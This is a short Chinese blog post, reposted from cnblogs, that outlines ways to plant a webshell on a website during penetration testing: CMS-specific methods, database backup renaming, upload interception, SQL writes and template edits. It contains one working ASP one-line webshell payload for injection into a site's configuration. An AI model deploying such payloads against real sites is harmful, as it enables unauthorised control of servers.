您的位置: 首页  >  文章  >  渗透之路 思路【第一篇】get webshell总结

渗透之路 思路【第一篇】get webshell总结

分类: 文章 2024-06-07 12:43:22

CMS获取Webshell方法

主要通过百度搜索CMS网站程序名称。
如:phpcms拿Webshell、WordPress后台拿Webshell等

非CMS获取Webshell方法

1、数据库备份获取Webshell

原理:后台文件重命名(e.g xxx.jpg-> xxx.asp)

渗透之路 思路【第一篇】get webshell总结

渗透之路 思路【第一篇】get webshell总结

渗透之路 思路【第一篇】get webshell总结

渗透之路 思路【第一篇】get webshell总结

2、抓包上传获取Webshell

 文件上传

3、Sql命令获取Webshell

渗透之路 思路【第一篇】get webshell总结

4、模板修改获取Webshell

"%> <%eval request("chopper")%><%'

渗透之路 思路【第一篇】get webshell总结

 

改完后配置文件数据也被修改

渗透之路 思路【第一篇】get webshell总结

 

网站标题在首页

渗透之路 思路【第一篇】get webshell总结

5、插入一句话获取Webshell

一般用图片一句话

数据库into_file写入一句话或木马

 

转载于:https://www.cnblogs.com/hyit/articles/11566222.html

相关推荐